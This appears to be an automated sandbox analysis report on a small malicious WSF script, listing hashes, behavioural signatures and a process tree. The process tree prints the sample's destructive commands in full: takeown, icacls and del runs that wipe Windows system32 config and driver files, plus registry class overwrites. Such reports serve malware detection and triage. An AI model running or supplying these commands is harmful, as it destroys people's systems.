Analysis

- max time kernel: 139s
- max time network: 128s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 15-08-2024 21:40

Static task: static1
Behavioral task: behavioral1
Sample: target.wsf
Resource: win7-20240729-en
General

- Target: target.wsf
- Size: 3KB
- MD5: 84b27604951d4deb2f10cc65c8f5c8a4
- SHA1: 74b27bad7133462abf462923dd3d056a4d655941
- SHA256: ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
- SHA512: d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce
Malware Config
Signatures

- Possible privilege escalation attempt (4 IoCs)
  Processes (pid | process):
    4228 | takeown.exe
    2412 | takeown.exe
    3672 | icacls.exe
    4060 | icacls.exe

- Checks computer location settings (2 TTPs, 2 IoCs)
  Looks up country code configured in the registry, likely geofence.
  Processes (description | ioc | process):
    Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | WScript.exe
    Key value queried | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000\Control Panel\International\Geo\Nation | cmd.exe

- Modifies file permissions (1 TTPs, 4 IoCs)
  Processes (pid | process):
    4228 | takeown.exe
    2412 | takeown.exe
    3672 | icacls.exe
    4060 | icacls.exe

- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).

- Modifies registry class (5 IoCs)
  Processes (description | ioc | process):
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*.dll\ | reg.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*.exe | reg.exe
    Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*.exe\ | reg.exe
    Key created | \REGISTRY\USER\S-1-5-21-2392887640-1187051047-2909758433-1000_Classes\Local Settings | cmd.exe
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*.dll | reg.exe

- Modifies registry key (1 TTPs, 1 IoCs)

- Runs regedit.exe (1 IoCs)
  Processes (pid | process):
    2968 | regedit.exe

- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes (description | pid | process):
    Token: SeTakeOwnershipPrivilege | 2412 | takeown.exe

- Suspicious use of WriteProcessMemory (20 IoCs)
  Processes (description | pid | process | target process):
    PID 2028 wrote to memory of 4984 | 2028 | cmd.exe | WScript.exe
    PID 2028 wrote to memory of 4984 | 2028 | cmd.exe | WScript.exe
    PID 4984 wrote to memory of 2024 | 4984 | WScript.exe | cmd.exe
    PID 4984 wrote to memory of 2024 | 4984 | WScript.exe | cmd.exe
    PID 4984 wrote to memory of 3472 | 4984 | WScript.exe | cmd.exe
    PID 4984 wrote to memory of 3472 | 4984 | WScript.exe | cmd.exe
    PID 2024 wrote to memory of 4228 | 2024 | cmd.exe | takeown.exe
    PID 2024 wrote to memory of 4228 | 2024 | cmd.exe | takeown.exe
    PID 3472 wrote to memory of 2412 | 3472 | cmd.exe | takeown.exe
    PID 3472 wrote to memory of 2412 | 3472 | cmd.exe | takeown.exe
    PID 2024 wrote to memory of 3672 | 2024 | cmd.exe | icacls.exe
    PID 2024 wrote to memory of 3672 | 2024 | cmd.exe | icacls.exe
    PID 3472 wrote to memory of 4060 | 3472 | cmd.exe | icacls.exe
    PID 3472 wrote to memory of 4060 | 3472 | cmd.exe | icacls.exe
    PID 4984 wrote to memory of 2564 | 4984 | WScript.exe | reg.exe
    PID 4984 wrote to memory of 2564 | 4984 | WScript.exe | reg.exe
    PID 4984 wrote to memory of 1332 | 4984 | WScript.exe | reg.exe
    PID 4984 wrote to memory of 1332 | 4984 | WScript.exe | reg.exe
    PID 4984 wrote to memory of 3432 | 4984 | WScript.exe | reg.exe
    PID 4984 wrote to memory of 3432 | 4984 | WScript.exe | reg.exe
Processes (process tree; indentation shows parent/child depth)

- C:\Windows\system32\cmd.exe
  Command line: cmd /c "copy C:\Users\Admin\AppData\Local\Temp\target.wsf C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs && start C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"
  - Checks computer location settings
  - Modifies registry class
  - Suspicious use of WriteProcessMemory
  PID: 2028

  - C:\Windows\System32\WScript.exe
    Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\target.wsf.vbs"
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID: 4984

    - C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\config\* >nul && icacls c:\windows\system32\config\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\config\* >nul 2>&1
      - Suspicious use of WriteProcessMemory
      PID: 2024

      - C:\Windows\system32\takeown.exe
        Command line: takeown /f c:\windows\system32\config\*
        - Possible privilege escalation attempt
        - Modifies file permissions
        PID: 4228

      - C:\Windows\system32\icacls.exe
        Command line: icacls c:\windows\system32\config\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions
        PID: 3672

    - C:\Windows\System32\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /c takeown /f c:\windows\system32\drivers\* >nul && icacls c:\windows\system32\drivers\* /grant everyone:(f) >nul && del /s /q c:\windows\system32\drivers\* >nul 2>&1
      - Suspicious use of WriteProcessMemory
      PID: 3472

      - C:\Windows\system32\takeown.exe
        Command line: takeown /f c:\windows\system32\drivers\*
        - Possible privilege escalation attempt
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
        PID: 2412

      - C:\Windows\system32\icacls.exe
        Command line: icacls c:\windows\system32\drivers\* /grant everyone:(f)
        - Possible privilege escalation attempt
        - Modifies file permissions
        PID: 4060

    - C:\Windows\System32\reg.exe
      Command line: "C:\Windows\System32\reg.exe" add HKCR\*.dll
      - Modifies registry class
      PID: 2564

    - C:\Windows\System32\reg.exe
      Command line: "C:\Windows\System32\reg.exe" add HKCR\*.exe
      - Modifies registry class
      PID: 1332

    - C:\Windows\System32\reg.exe
      Command line: "C:\Windows\System32\reg.exe" add HKLM\*
      - Modifies registry key
      PID: 3432

- C:\Windows\regedit.exe
  Command line: "C:\Windows\regedit.exe"
  - Runs regedit.exe
  PID: 2968
Network
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 3KB
  MD5: 84b27604951d4deb2f10cc65c8f5c8a4
  SHA1: 74b27bad7133462abf462923dd3d056a4d655941
  SHA256: ffdf818a1b93d894a6bc900b23274f6cc5b3738eec93de978033ddd1f7746ae9
  SHA512: d8185f6fc7520d720239a3d02516d360f23d8eda4b77e49859ed0641ab6c3aa53b2de4f7d5994e1e138470f6b7f2fa2d116dc6801c23546b701f264451ee33ce

- Filesize: 79B
  MD5: dfcef0997fe6b53193f96908bc2d7839
  SHA1: bec87de5852184953fe5025aa7a6017e23deead1
  SHA256: 9d2e842fed982dd1f6d185c93feedacb4ac5670f61d9f1934509f159e62a6168
  SHA512: ed4c7fc86525e24651e5c10533da47065d78076b47caacbb08003ed7b475ac23b41fe623b9db5330b3d947ee9df6043f2bf8c77722cab99a864ae5f7d90a2f74